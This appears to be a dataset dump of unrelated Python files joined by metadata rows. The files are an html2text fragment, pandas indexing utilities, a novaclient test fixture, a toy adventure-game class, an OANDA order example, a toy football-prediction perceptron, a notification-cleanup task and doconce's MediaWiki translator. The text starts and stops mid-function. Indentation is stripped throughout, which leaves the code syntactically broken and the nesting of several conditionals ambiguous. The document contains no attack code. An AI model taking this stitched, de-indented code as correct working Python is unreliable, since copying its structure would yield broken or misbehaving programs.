data = re.sub ("(?i)</h[0-9]>", "[0m\n", data)
else:
data = re.sub ("(?i)</h[0-9]>", "\n", data)
data = re.sub ("(?i)<ul>", "\n<UL>\n", data)
data = re.sub ("(?i)</ul>", "\n</UL>\n", data)
data = re.sub ("(?i)<center>", "\n<CENTER>\n", data)
data = re.sub ("(?i)</center>", "\n</CENTER>\n", data)
data = re.sub ("(?i)</div>", "\n", data)
if use_ansi:
data = re.sub ("(?i)<b>", "[1m", data)
data = re.sub ("(?i)</b>", "[0m", data)
data = re.sub ("(?i)<i>", "[2m", data)
data = re.sub ("(?i)</i>", "[0m", data)
data = re.sub ("(?i)<title>", "\n<CENTER>\n[31m", data)
data = re.sub ("(?i)</title>", "[0m\n</CENTER>\n", data)
else:
data = re.sub ("(?i)<title>", "\n<CENTER>\n", data)
data = re.sub ("(?i)</title>", "\n</CENTER>\n", data)
data = re.sub ("(?i)<p>", "\n", data)
data = re.sub ("(?i)<tr[^>]*>", "\n", data)
data = re.sub ("(?i)</table>", "\n", data)
data = re.sub ("(?i)<td[^>]*>", "\t", data)
data = re.sub ("(?i)<th[^>]*>", "\t", data)
data = re.sub (" *\n", "\n", data)
lines = string.split (data, "\n")
output = []
for line in lines:
if line == "<UL>":
indent = indent + 1
elif line == "</UL>":
indent = indent - 1
if indent < 0: indent = 0
elif line == "<CENTER>":
center = center + 1
elif line == "</CENTER>":
center = center - 1
if center < 0: center = 0
else:
if center:
line = " "*indent + string.strip(line)
nline = re.sub("\[.*?m", "", line)
nline = re.sub ("<[^>]*>", "", nline)
c = WIDTH/2 - (len (nline) / 2)
output.append (" "*c + line)
else:
output.append (" "*indent + line)
data = string.join (output, "\n")
data = re.sub (" *\n", "\n", data)
data = re.sub ("\n\n\n*", "\n\n", data)
data = re.sub ("<[^>]*>", "", data)
return (data, center, indent)
def html2text (data, use_ansi = 0, is_latin1 = 0):
pre = re.split("(?s)(<pre>[^<]*</pre>)", data)
out = []
indent = 0
center = 0
for part in pre:
if part[:5] != "<pre>":
(res, center, indent) = tag_replace (part,center,indent, use_ansi)
out.append (res)
else:
part = re.sub("(?i)</*pre>", "", part)
out.append (part)
data = string.join (out)
data = re.sub (">", ">", data)
data = re.sub ("<", "<", data)
data = re.sub (" ", " ", data)
return data
def usage(progname):
print "usage: %s --help <htmlfile>" % progname
print __doc__
def main(argc, argv):
progname = argv[0]
alist, args = getopt.getopt(argv[1:], "", ["help"])
for (field, val) in alist:
if field == "--help":
usage(progname)
return
if len(args):
file = args[0]
else:
return
progname = argv[0]
fp = open (file)
data = fp.read()
fp.close()
if data:
print (html2text(data))
else:
print "Document contained no data"
if __name__ == "__main__":
main(len(sys.argv), sys.argv)
|
gpl-2.0
| 3,743,144,919,791,192,600 | 26.594595 | 72 | 0.481636 | false | 2.765064 | false | false | false |
rs2/pandas
|
pandas/core/indexers.py
|
1
|
14164
|
"""
Low-dependency indexing utilities.
"""
import warnings
import numpy as np
from pandas._typing import Any, AnyArrayLike
from pandas.core.dtypes.common import (
is_array_like,
is_bool_dtype,
is_extension_array_dtype,
is_integer,
is_integer_dtype,
is_list_like,
)
from pandas.core.dtypes.generic import ABCIndexClass, ABCSeries
# -----------------------------------------------------------
# Indexer Identification
def is_valid_positional_slice(slc: slice) -> bool:
"""
Check if a slice object can be interpreted as a positional indexer.
Parameters
----------
slc : slice
Returns
-------
bool
Notes
-----
A valid positional slice may also be interpreted as a label-based slice
depending on the index being sliced.
"""
def is_int_or_none(val):
return val is None or is_integer(val)
return (
is_int_or_none(slc.start)
and is_int_or_none(slc.stop)
and is_int_or_none(slc.step)
)
def is_list_like_indexer(key) -> bool:
"""
Check if we have a list-like indexer that is *not* a NamedTuple.
Parameters
----------
key : object
Returns
-------
bool
"""
# allow a list_like, but exclude NamedTuples which can be indexers
return is_list_like(key) and not (isinstance(key, tuple) and type(key) is not tuple)
def is_scalar_indexer(indexer, ndim: int) -> bool:
"""
Return True if we are all scalar indexers.
Parameters
----------
indexer : object
ndim : int
Number of dimensions in the object being indexed.
Returns
-------
bool
"""
if isinstance(indexer, tuple):
if len(indexer) == ndim:
return all(
is_integer(x) or (isinstance(x, np.ndarray) and x.ndim == len(x) == 1)
for x in indexer
)
return False
def is_empty_indexer(indexer, arr_value: np.ndarray) -> bool:
"""
Check if we have an empty indexer.
Parameters
----------
indexer : object
arr_value : np.ndarray
Returns
-------
bool
"""
if is_list_like(indexer) and not len(indexer):
return True
if arr_value.ndim == 1:
if not isinstance(indexer, tuple):
indexer = tuple([indexer])
return any(isinstance(idx, np.ndarray) and len(idx) == 0 for idx in indexer)
return False
# -----------------------------------------------------------
# Indexer Validation
def check_setitem_lengths(indexer, value, values) -> bool:
"""
Validate that value and indexer are the same length.
    A special case is allowed for when the indexer is a boolean array
and the number of true values equals the length of ``value``. In
this case, no exception is raised.
Parameters
----------
indexer : sequence
Key for the setitem.
value : array-like
Value for the setitem.
values : array-like
Values being set into.
Returns
-------
bool
Whether this is an empty listlike setting which is a no-op.
Raises
------
ValueError
When the indexer is an ndarray or list and the lengths don't match.
"""
no_op = False
if isinstance(indexer, (np.ndarray, list)):
# We can ignore other listlikes because they are either
# a) not necessarily 1-D indexers, e.g. tuple
# b) boolean indexers e.g. BoolArray
if is_list_like(value):
if len(indexer) != len(value):
# boolean with truth values == len of the value is ok too
if not (
isinstance(indexer, np.ndarray)
and indexer.dtype == np.bool_
and len(indexer[indexer]) == len(value)
):
raise ValueError(
"cannot set using a list-like indexer "
"with a different length than the value"
)
if not len(indexer):
no_op = True
elif isinstance(indexer, slice):
if is_list_like(value):
if len(value) != length_of_indexer(indexer, values):
raise ValueError(
"cannot set using a slice indexer with a "
"different length than the value"
)
if not len(value):
no_op = True
return no_op
def validate_indices(indices: np.ndarray, n: int) -> None:
"""
Perform bounds-checking for an indexer.
-1 is allowed for indicating missing values.
Parameters
----------
indices : ndarray
n : int
Length of the array being indexed.
Raises
------
ValueError
Examples
--------
>>> validate_indices([1, 2], 3)
# OK
>>> validate_indices([1, -2], 3)
ValueError
>>> validate_indices([1, 2, 3], 3)
IndexError
>>> validate_indices([-1, -1], 0)
# OK
>>> validate_indices([0, 1], 0)
IndexError
"""
if len(indices):
min_idx = indices.min()
if min_idx < -1:
msg = f"'indices' contains values less than allowed ({min_idx} < -1)"
raise ValueError(msg)
max_idx = indices.max()
if max_idx >= n:
raise IndexError("indices are out-of-bounds")
# -----------------------------------------------------------
# Indexer Conversion
def maybe_convert_indices(indices, n: int):
"""
Attempt to convert indices into valid, positive indices.
If we have negative indices, translate to positive here.
If we have indices that are out-of-bounds, raise an IndexError.
Parameters
----------
indices : array-like
Array of indices that we are to convert.
n : int
Number of elements in the array that we are indexing.
Returns
-------
array-like
An array-like of positive indices that correspond to the ones
that were passed in initially to this function.
Raises
------
IndexError
        One of the converted indices either exceeded the number of
        elements (specified by `n`), or was still negative.
"""
if isinstance(indices, list):
indices = np.array(indices)
if len(indices) == 0:
# If `indices` is empty, np.array will return a float,
# and will cause indexing errors.
return np.empty(0, dtype=np.intp)
mask = indices < 0
if mask.any():
indices = indices.copy()
indices[mask] += n
mask = (indices >= n) | (indices < 0)
if mask.any():
raise IndexError("indices are out-of-bounds")
return indices
# -----------------------------------------------------------
# Unsorted
def length_of_indexer(indexer, target=None) -> int:
"""
Return the expected length of target[indexer]
Returns
-------
int
"""
if target is not None and isinstance(indexer, slice):
target_len = len(target)
start = indexer.start
stop = indexer.stop
step = indexer.step
if start is None:
start = 0
elif start < 0:
start += target_len
if stop is None or stop > target_len:
stop = target_len
elif stop < 0:
stop += target_len
if step is None:
step = 1
elif step < 0:
start, stop = stop + 1, start + 1
step = -step
return (stop - start + step - 1) // step
elif isinstance(indexer, (ABCSeries, ABCIndexClass, np.ndarray, list)):
if isinstance(indexer, list):
indexer = np.array(indexer)
if indexer.dtype == bool:
# GH#25774
return indexer.sum()
return len(indexer)
elif not is_list_like_indexer(indexer):
return 1
raise AssertionError("cannot find the length of the indexer")
def deprecate_ndim_indexing(result, stacklevel=3):
"""
Helper function to raise the deprecation warning for multi-dimensional
indexing on 1D Series/Index.
GH#27125 indexer like idx[:, None] expands dim, but we cannot do that
and keep an index, so we currently return ndarray, which is deprecated
(Deprecation GH#30588).
"""
if np.ndim(result) > 1:
warnings.warn(
"Support for multi-dimensional indexing (e.g. `obj[:, None]`) "
"is deprecated and will be removed in a future "
"version. Convert to a numpy array before indexing instead.",
FutureWarning,
stacklevel=stacklevel,
)
def unpack_1tuple(tup):
"""
If we have a length-1 tuple/list that contains a slice, unpack to just
the slice.
Notes
-----
The list case is deprecated.
"""
if len(tup) == 1 and isinstance(tup[0], slice):
# if we don't have a MultiIndex, we may still be able to handle
# a 1-tuple. see test_1tuple_without_multiindex
if isinstance(tup, list):
# GH#31299
warnings.warn(
"Indexing with a single-item list containing a "
"slice is deprecated and will raise in a future "
"version. Pass a tuple instead.",
FutureWarning,
stacklevel=3,
)
return tup[0]
return tup
# -----------------------------------------------------------
# Public indexer validation
def check_array_indexer(array: AnyArrayLike, indexer: Any) -> Any:
"""
Check if `indexer` is a valid array indexer for `array`.
For a boolean mask, `array` and `indexer` are checked to have the same
length. The dtype is validated, and if it is an integer or boolean
ExtensionArray, it is checked if there are missing values present, and
it is converted to the appropriate numpy array. Other dtypes will raise
an error.
Non-array indexers (integer, slice, Ellipsis, tuples, ..) are passed
through as is.
.. versionadded:: 1.0.0
Parameters
----------
array : array-like
The array that is being indexed (only used for the length).
indexer : array-like or list-like
The array-like that's used to index. List-like input that is not yet
a numpy array or an ExtensionArray is converted to one. Other input
types are passed through as is.
Returns
-------
numpy.ndarray
The validated indexer as a numpy array that can be used to index.
Raises
------
IndexError
When the lengths don't match.
ValueError
When `indexer` cannot be converted to a numpy ndarray to index
(e.g. presence of missing values).
See Also
--------
api.types.is_bool_dtype : Check if `key` is of boolean dtype.
Examples
--------
When checking a boolean mask, a boolean ndarray is returned when the
arguments are all valid.
>>> mask = pd.array([True, False])
>>> arr = pd.array([1, 2])
>>> pd.api.indexers.check_array_indexer(arr, mask)
array([ True, False])
An IndexError is raised when the lengths don't match.
>>> mask = pd.array([True, False, True])
>>> pd.api.indexers.check_array_indexer(arr, mask)
Traceback (most recent call last):
...
IndexError: Boolean index has wrong length: 3 instead of 2.
NA values in a boolean array are treated as False.
>>> mask = pd.array([True, pd.NA])
>>> pd.api.indexers.check_array_indexer(arr, mask)
array([ True, False])
A numpy boolean mask will get passed through (if the length is correct):
>>> mask = np.array([True, False])
>>> pd.api.indexers.check_array_indexer(arr, mask)
array([ True, False])
Similarly for integer indexers, an integer ndarray is returned when it is
a valid indexer, otherwise an error is (for integer indexers, a matching
length is not required):
>>> indexer = pd.array([0, 2], dtype="Int64")
>>> arr = pd.array([1, 2, 3])
>>> pd.api.indexers.check_array_indexer(arr, indexer)
array([0, 2])
>>> indexer = pd.array([0, pd.NA], dtype="Int64")
>>> pd.api.indexers.check_array_indexer(arr, indexer)
Traceback (most recent call last):
...
ValueError: Cannot index with an integer indexer containing NA values
For non-integer/boolean dtypes, an appropriate error is raised:
>>> indexer = np.array([0., 2.], dtype="float64")
>>> pd.api.indexers.check_array_indexer(arr, indexer)
Traceback (most recent call last):
...
IndexError: arrays used as indices must be of integer or boolean type
"""
from pandas.core.construction import array as pd_array
# whatever is not an array-like is returned as-is (possible valid array
# indexers that are not array-like: integer, slice, Ellipsis, None)
# In this context, tuples are not considered as array-like, as they have
# a specific meaning in indexing (multi-dimensional indexing)
if is_list_like(indexer):
if isinstance(indexer, tuple):
return indexer
else:
return indexer
# convert list-likes to array
if not is_array_like(indexer):
indexer = pd_array(indexer)
if len(indexer) == 0:
# empty list is converted to float array by pd.array
indexer = np.array([], dtype=np.intp)
dtype = indexer.dtype
if is_bool_dtype(dtype):
if is_extension_array_dtype(dtype):
indexer = indexer.to_numpy(dtype=bool, na_value=False)
else:
indexer = np.asarray(indexer, dtype=bool)
# GH26658
if len(indexer) != len(array):
raise IndexError(
f"Boolean index has wrong length: "
f"{len(indexer)} instead of {len(array)}"
)
elif is_integer_dtype(dtype):
try:
indexer = np.asarray(indexer, dtype=np.intp)
except ValueError as err:
raise ValueError(
"Cannot index with an integer indexer containing NA values"
) from err
else:
raise IndexError("arrays used as indices must be of integer or boolean type")
return indexer
|
bsd-3-clause
| 7,059,395,294,665,719,000 | 27.556452 | 88 | 0.578791 | false | 4.2509 | false | false | false |
Shihta/python-novaclient
|
novaclient/tests/fixture_data/security_groups.py
|
1
|
3693
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from novaclient.openstack.common import jsonutils
from novaclient.tests import fakes
from novaclient.tests.fixture_data import base
class Fixture(base.Fixture):
base_url = 'os-security-groups'
def setUp(self):
super(Fixture, self).setUp()
security_group_1 = {
"name": "test",
"description": "FAKE_SECURITY_GROUP",
"tenant_id": "4ffc664c198e435e9853f2538fbcd7a7",
"id": 1,
"rules": [
{
"id": 11,
"group": {},
"ip_protocol": "TCP",
"from_port": 22,
"to_port": 22,
"parent_group_id": 1,
"ip_range": {"cidr": "10.0.0.0/8"}
},
{
"id": 12,
"group": {
"tenant_id": "272bee4c1e624cd4a72a6b0ea55b4582",
"name": "test2"
},
"ip_protocol": "TCP",
"from_port": 222,
"to_port": 222,
"parent_group_id": 1,
"ip_range": {}
}
]
}
security_group_2 = {
"name": "test2",
"description": "FAKE_SECURITY_GROUP2",
"tenant_id": "272bee4c1e624cd4a72a6b0ea55b4582",
"id": 2,
"rules": []
}
get_groups = {'security_groups': [security_group_1, security_group_2]}
headers = {'Content-Type': 'application/json'}
self.requests.register_uri('GET', self.url(),
json=get_groups,
headers=headers)
get_group_1 = {'security_group': security_group_1}
self.requests.register_uri('GET', self.url(1),
json=get_group_1,
headers=headers)
self.requests.register_uri('DELETE', self.url(1), status_code=202)
def post_os_security_groups(request, context):
body = jsonutils.loads(request.body)
assert list(body) == ['security_group']
fakes.assert_has_keys(body['security_group'],
required=['name', 'description'])
return {'security_group': security_group_1}
self.requests.register_uri('POST', self.url(),
json=post_os_security_groups,
headers=headers,
status_code=202)
def put_os_security_groups_1(request, context):
body = jsonutils.loads(request.body)
assert list(body) == ['security_group']
fakes.assert_has_keys(body['security_group'],
required=['name', 'description'])
return body
self.requests.register_uri('PUT', self.url(1),
json=put_os_security_groups_1,
headers=headers,
status_code=205)
|
apache-2.0
| 2,774,355,458,957,496,300 | 36.30303 | 78 | 0.486325 | false | 4.324356 | false | false | false |
PurpleHominid/The-Warlock-of-Firetop-Mountain
|
WOFT_01.py
|
1
|
1632
|
class clsLocation:
#this class provides the support for enumerated locations
ROOM=0
DOOR=1
WALL=2
#some more changes went here before the start of the service
#
#
#this branch is called development 01
#this is another branch here
class clsPlayerState:
#this class provides the functions to support the player state
#define class based variables; common to all instances
__playerCount=0 #create a common variable; use '__' to hide the variable
def __init__(self, startState):
#this function is automatically executed when a new class instance is created
clsPlayerState.__playerCount+=1 #increase the hidden player count
#define instance variables, specific to single instance
self.location=startState #initialise the stating location
def fnUpdate(self):
#this function updates the players state
if self.location==clsLocation.ROOM: #at the room
self.fnROOM() #create options for room
elif self.location==clsLocation.DOOR: #at the door
self.fnDOOR() #create options for door
elif self.location==clsLocation.WALL: #at the wall
self.fnWALL() #create options for wall
def fnROOM(self):
#describe the location
print("You are at the room")
def fnDOOR(self):
#describe the location
print("You are at the door")
def fnWALL(self):
#describe the location
print("You are at the wall")
#begin the main code
insPlayer=clsPlayerState(clsLocation.ROOM) #initialise the player instance using the class
insPlayer.fnUpdate()
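#demonstrate a state change (illustrative addition): move the player and update again
insPlayer.location=clsLocation.DOOR #move the player to the door
insPlayer.fnUpdate() #describe the new location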
|
mit
| 5,276,123,399,268,443,000 | 27.137931 | 90 | 0.681985 | false | 4.25 | false | false | false |
hootnot/oandapyV20-examples
|
src/contrib_mo_tp_sl.py
|
1
|
1328
|
# -*- coding: utf-8 -*-
"""Example demonstrating the contrib.request classes.
Create a MarketOrderRequest to enter 10000 EUR_USD LONG position along with
- a TakeProfitOrder to take profit @1.10
- a StopLossOrder to take loss @1.07
These values apply for this moment: EUR_USD 1.0605
So when you run the example you may need to change the values.
"""
import json
from oandapyV20.contrib.requests import (
MarketOrderRequest,
TakeProfitDetails,
StopLossDetails
)
import oandapyV20.endpoints.orders as orders
import oandapyV20
from exampleauth import exampleAuth
accountID, access_token = exampleAuth()
api = oandapyV20.API(access_token=access_token)
# EUR_USD (today 1.0605)
EUR_USD_STOP_LOSS = 1.05
EUR_USD_TAKE_PROFIT = 1.10
# The orderspecs
mktOrder = MarketOrderRequest(
instrument="EUR_USD",
units=10000,
takeProfitOnFill=TakeProfitDetails(price=EUR_USD_TAKE_PROFIT).data,
stopLossOnFill=StopLossDetails(price=EUR_USD_STOP_LOSS).data
)
print("Market Order specs: \n{}".format(json.dumps(mktOrder.data, indent=4)))
# create the OrderCreate request
r = orders.OrderCreate(accountID, data=mktOrder.data)
try:
# create the OrderCreate request
rv = api.request(r)
except oandapyV20.exceptions.V20Error as err:
print(r.status_code, err)
else:
print(json.dumps(rv, indent=2))
|
mit
| -5,632,243,889,746,396,000 | 25.039216 | 77 | 0.750753 | false | 2.951111 | false | false | false |
thommiller/ANN---Pymier-League
|
Main.py
|
1
|
1763
|
import numpy as np
# sigmoid function
def nonlin(x,deriv=False):
if(deriv==True):
return x*(1-x)
return 1/(1+np.exp(-x))
def displayPred(num):
if(num> 0.5 and num <0.75):
return " - Draw"
elif(num>0.75):
return " - Win"
else:
return " - Loss"
# for training data we will compare Man-Utd's last 10 games
# input data will be [homeTeam, awayTeam]
# output data will be [0 | loss, 0.5 | draw, 1 | win]
# input dataset - every football match from 2014-2015 (MASSIVE WEB SCRAPING TASK)
#man u = 0, stoke = 1, yeovil town = 2, QPR = 3, cambridge = 4, leicester = 5
teams = ["Man U", "Stoke", "Yeovil Town", "QPR", "Cambridge", "Leicester"]
X = np.array([ [1,0], #stoke vs man u - draw
[0,2], #yeovil town vs man u - won
[3,0],
[4,0],
[0,5]
])
# output dataset
y = np.array([[0.5,1,1,0.5,1]]).T
# seed random numbers to make calculation
# deterministic (just a good practice)
np.random.seed(1)
# initialize weights randomly with mean 0
syn0 = 3*np.random.random((2,1)) - 1
for iter in xrange(10000):
# forward propagation
l0 = X
l1 = nonlin(np.dot(l0,syn0))
# how much did we miss?
l1_error = y - l1
# multiply how much we missed by the
# slope of the sigmoid at the values in l1
l1_delta = l1_error * nonlin(l1,True)
# update weights
syn0 += np.dot(l0.T, l1_delta)
print "Game predictions based on training data:"
print teams[1],"\t\tvs\t",teams[0], displayPred(l1[0])
print teams[0],"\t\tvs\t",teams[2], displayPred(l1[1])
print teams[3],"\t\tvs\t",teams[0], displayPred(l1[2])
print teams[4],"\tvs\t",teams[0], displayPred(l1[3])
print teams[0],"\t\tvs\t",teams[5], displayPred(l1[4])
|
mit
| 3,757,302,599,893,747,700 | 27.435484 | 81 | 0.600681 | false | 2.716487 | false | false | false |
Outernet-Project/librarian
|
librarian/tasks/notifications.py
|
1
|
1481
|
import datetime
import logging
from greentasks import Task
from ..core.exts import ext_container as exts
from ..core.utils import utcnow
class NotificationCleanupTask(Task):
name = 'notifications'
periodic = True
def get_start_delay(self):
return exts.config['notifications.default_expiry']
def get_delay(self, previous_delay):
return exts.config['notifications.default_expiry']
def run(self):
db = exts.databases.librarian
default_expiry = exts.config['notifications.default_expiry']
logging.debug("Notification cleanup started.")
now = utcnow()
auto_expires_at = now - datetime.timedelta(seconds=default_expiry)
where = '''notifications.dismissable = true AND (
(notifications.expires_at IS NULL AND
notifications.created_at <= %(auto_expires_at)s) OR
notifications.expires_at <= %(now)s)'''
query = db.Delete('notifications', where=where)
target_query = db.Delete('notification_targets USING notifications',
where=where)
target_query.where += ('notification_targets.notification_id = '
'notifications.notification_id')
params = dict(now=now, auto_expires_at=auto_expires_at)
db.execute(target_query, params)
rows = db.execute(query, params)
logging.debug("{} expired notifications deleted.".format(rows))
|
gpl-3.0
| -2,417,505,482,011,534,000 | 37.973684 | 76 | 0.633356 | false | 4.434132 | false | false | false |
wolf9s/doconce
|
lib/doconce/mwiki.py
|
1
|
17031
|
"""
MediaWiki translator, aimed at Wikipedia/WikiBooks type of web pages.
Syntax defined by http://en.wikipedia.org/wiki/Help:Wiki_markup
and http://en.wikipedia.org/wiki/Help:Displaying_a_formula.
The prefix m in the name mwiki distinguishes this translator from
gwiki (googlecode wiki).
Not yet implemented:
mwiki_ref_and_label (just using code from gwiki)
Just using plan ASCII solutions for index_bib (requires some work to
port to MediaWiki, but is straightforward - use rst as template) and
exercise (probably ok with the plain solution).
GitHub wiki pages understand MediaWiki, see
https://github.com/github/gollum
The page http://en.wikibooks.org/wiki/Wikibooks:Sandbox is fine for
short-lived experiments.
http://shoutwiki.com can host MediaWiki pages.
http://jumpwiki.com/wiki/Main_Page can also host MediaWiki pages, but
there are troubles with align envirs and math (ugly typesetting and
some strange indents).
Create a user account, choose *Create a Wiki* in the menu on the left,
fill out the form, wait until you get a Main Page, click on edit, make
references to a new page, say [[First demo|demo]], save, click on
demo and fill out that page with the content of a mydoconcefile.wiki,
sometimes it is necessary to create a new account, just do that and
go back.
"""
import re, os, commands, sys
from common import default_movie, plain_exercise, insert_code_and_tex
from plaintext import plain_quiz
from misc import _abort
def align2equations(math_text):
"""
Transform an align environment to a set of equation environments.
Used to handle multiple equations if align does not work well.
Note: This version is outdated. common.align2equations is the
newest attempt to implement align in terms of single equations.
"""
if not '{align' in math_text:
return
math_text = math_text.replace('&', '')
math_text = math_text.replace('\\\\', r"""
</math>
:<math>""")
pattern = r'\\(begin|end)\{align\*?\}\s*'
math_text = re.sub(pattern, '', math_text)
# :<math> and </math> surroundings appear when !bt and !et are translated
return math_text
def equation2nothing(math_text):
pattern = r'\\(begin|end)\{equation\*?\}\s*'
math_text = re.sub(pattern, '', math_text)
math_text = math_text.replace(r'\[', '')
math_text = math_text.replace(r'\]', '')
return math_text
def remove_labels(math_text):
pattern = 'label\{(.+?)\}\s*'
labels = re.findall(pattern, math_text)
if labels:
math_text = re.sub(pattern, '', math_text)
return math_text, labels
def mwiki_code(filestr, code_blocks, code_block_types,
tex_blocks, format):
# http://en.wikipedia.org/wiki/Help:Displaying_a_formula
# MediaWiki math does not support labels in equations.
# The enviros equation and \[ \] must be removed (not supported).
for i in range(len(tex_blocks)):
# Standard align works in Wikipedia and Wikibooks.
# Standard align gives somewhat ugly output on wiiki.com services,
# but a set of separate equations is not much better.
# We therefore stick to align instead.
#tex_blocks[i] = align2equations(tex_blocks[i])
tex_blocks[i] = equation2nothing(tex_blocks[i])
tex_blocks[i], labels = remove_labels(tex_blocks[i])
for label in labels:
if label in filestr:
print '*** warning: reference to label "%s" in an equation does not work in MediaWiki' % label
filestr = insert_code_and_tex(filestr, code_blocks, tex_blocks, format)
# Supported programming languages:
# http://www.mediawiki.org/wiki/Extension:SyntaxHighlight_GeSHi#Supported_languages
envir2lang = dict(cod='python', pycod='python', cycod='python',
fcod='fortran', ccod='c', cppcod='cpp',
mcod='matlab', plcod='perl', shcod='bash',
pro='python', pypro='python', cypro='python',
fpro='fortran', cpro='c', cpppro='cpp',
mpro='matlab', plpro='perl', shpro='bash',
rbpro='ruby', rbcod='ruby',
javacod='java', javapro='java',
htmlcod='html5', xmlcod='xml',
htmlpro='html5', xmlpro='xml',
html='html5', xml='xml',
sys='bash', dat='text', csv='text', txt='text',
pyoptpro='python', pyscpro='python',
ipy='python', pyshell='python',
)
for key in envir2lang:
language = envir2lang[key]
cpattern = re.compile(r'^!bc\s+%s\s*\n' % key, flags=re.MULTILINE)
filestr = cpattern.sub('<syntaxhighlight lang="%s">\n' % \
envir2lang[key], filestr)
c = re.compile(r'^!bc.*$\n', re.MULTILINE)
filestr = c.sub('<syntaxhighlight lang="text">\n', filestr)
filestr = re.sub(r'!ec\n', '</syntaxhighlight>\n', filestr)
c = re.compile(r'^!bt\n', re.MULTILINE)
filestr = c.sub(':<math>\n', filestr)
filestr = re.sub(r'!et\n', '</math>\n', filestr)
# Final fix of MediaWiki file
# __TOC__ syntax is misinterpretated as paragraph heading, so we
# use <<<TOC>>> instead and replace to right syntax here at the end.
filestr = filestr.replace('<<<TOC>>>', '__TOC__')
return filestr
def mwiki_figure(m):
filename = m.group('filename')
link = filename if filename.startswith('http') else None
if not link and not os.path.isfile(filename):
raise IOError('no figure file %s' % filename)
basename = os.path.basename(filename)
stem, ext = os.path.splitext(basename)
root, ext = os.path.splitext(filename)
if link is None:
if not ext in '.png .gif .jpg .jpeg'.split():
# try to convert image file to PNG, using
# convert from ImageMagick:
cmd = 'convert %s png:%s' % (filename, root+'.png')
failure, output = commands.getstatusoutput(cmd)
if failure:
print '\n**** warning: could not run ', cmd
print ' convert %s to PNG format manually' % filename
_abort()
filename = root + '.png'
caption = m.group('caption').strip()
if caption != '':
caption = '|' + caption # add | for non-empty caption
else:
# Avoid filename as caption when caption is empty
# see http://www.mediawiki.org/wiki/Help:Images
caption = '|<span title=""></span>'
# keep label if it's there:
caption = re.sub(r'label\{(.+?)\}', '(\g<1>)', caption)
size = ''
opts = m.group('options').strip()
if opts:
info = dict([s.split('=') for s in opts.split()])
if 'width' in info and 'height' in info:
size = '|%sx%spx' % (info['width'], info['height'])
elif 'width' in info:
size = '|%spx' % info['width']
elif 'height' in info:
size = '|x%spx' % info['height']
if link:
# We link to some image on the web
filename = os.path.basename(filename)
link = os.path.dirname(link)
result = r"""
[[File:%s|frame%s|link=%s|alt=%s%s]]
""" % (filename, size, link, filename, caption)
else:
# We try to link to a file at wikimedia.org.
found_wikimedia = False
orig_filename = filename
# Check if the file exists and find the appropriate wikimedia name.
# http://en.wikipedia.org/w/api.php?action=query&titles=Image:filename&prop=imageinfo&format=xml
# Skip directories - get the basename
filename = os.path.basename(filename)
import urllib
prms = urllib.urlencode({
'action': 'query', 'titles': 'Image:' + filename,
'prop': 'imageinfo', 'format': 'xml'})
url = 'http://en.wikipedia.org/w/api.php?' + prms
try:
print ' ...checking if %s is stored at en.wikipedia.org/w/api.php...' % filename
f = urllib.urlopen(url)
imageinfo = f.read()
f.close()
def get_data(name, text):
pattern = '%s="(.*?)"' % name
m = re.search(pattern, text)
if m:
match = m.group(1)
if 'Image:' in match:
return match.split('Image:')[1]
if 'File:' in match:
return match.split('File:')[1]
else:
return match
else:
return None
data = ['from', 'to', 'title', 'missing', 'imagerepository',
'timestamp', 'user']
orig_filename = filename
filename = get_data('title', imageinfo)
user = get_data('user', imageinfo)
timestamp = get_data('timestamp', imageinfo)
if user:
found_wikimedia = True
print ' ...found %s at wikimedia' % filename
result = r"""
[[File:%s|frame%s|alt=%s%s]] <!-- user: %s, filename: %s, timestamp: %s -->
""" % (filename, size, filename, caption, user, orig_filename, timestamp)
except IOError:
print ' ...no Internet connection...'
if not found_wikimedia:
print ' ...for wikipedia/wikibooks you must upload image file %s to\n common.wikimedia.org' % orig_filename
# see http://commons.wikimedia.org/wiki/Commons:Upload
# and http://commons.wikimedia.org/wiki/Special:UploadWizard
print ' ...for now we use local file %s' % filename
# This is fine if we use github wiki
result = r"""
[[File:%s|frame%s|alt=%s%s]] <!-- not yet uploaded to common.wikimedia.org -->
""" % (filename, size, filename, caption)
return result
from common import table_analysis
def mwiki_author(authors_and_institutions, auth2index,
inst2index, index2inst, auth2email):
authors = []
for author, i, email in authors_and_institutions:
if email is None:
email_text = ''
else:
name, adr = email.split('@')
email_text = ' (%s at %s)' % (name, adr)
authors.append('_%s_%s' % (author, email_text))
if len(authors) == 1:
authors = authors[0]
elif len(authors) == 2:
authors = authors[0] + ' and ' + authors[1]
elif len(authors) > 2:
authors[-1] = 'and ' + authors[-1]
authors = ', '.join(authors)
else:
# no authors:
return ''
text = '\n\nBy ' + authors + '\n\n'
# we skip institutions in mwiki
return text
from gwiki import wiki_ref_and_label_common
def mwiki_ref_and_label(section_label2title, format, filestr):
return wiki_ref_and_label_common(section_label2title, format, filestr)
def mwiki_admon(block, format, title='Warning', text_size='normal',
admon_type='warning'):
if title.lower().strip() == 'none':
title = ''
# Blocks without explicit title should have empty title
if title == 'Block':
title = ''
if title and title[-1] not in ('.', ':', '!', '?'):
        # Make sure the title ends with punctuation
title += '.'
admon_type2mwiki = dict(notice='notice',
warning='warning', # or critical or important
hint='notice',
quote='quote')
if admon_type in admon_type2mwiki:
admon_type = admon_type2mwiki[admon_type] # use mwiki admon
else:
admon_type = title # Just use the title
text = "'''%s''' " % title + block
if text_size == 'normal':
text_size = '90%'
elif text_size == 'large':
text_size = '130%'
elif text_size == 'small':
text_size = '80%'
if admon_type == 'quote':
s = """
{{quote box
| quote = %s
| textstyle = font-size: %s;
}}
""" % (block, text_size)
# quote has also | source = ... but other formats like
# latex and html have no specific source tag, so it must
# be typeset manually
else:
s = """
{{mbox
| type = %s
| textstyle = font-size: %s;
| text = %s
}}
""" % (admon_type, text_size, text)
return s
# mbox: notice
def define(FILENAME_EXTENSION,
BLANKLINE,
INLINE_TAGS_SUBST,
CODE,
LIST,
ARGLIST,
TABLE,
EXERCISE,
FIGURE_EXT,
CROSS_REFS,
INDEX_BIB,
TOC,
ENVIRS,
QUIZ,
INTRO,
OUTRO,
filestr):
# all arguments are dicts and accept in-place modifications (extensions)
FILENAME_EXTENSION['mwiki'] = '.mwiki' # output file extension
BLANKLINE['mwiki'] = '\n'
# replacement patterns for substitutions of inline tags
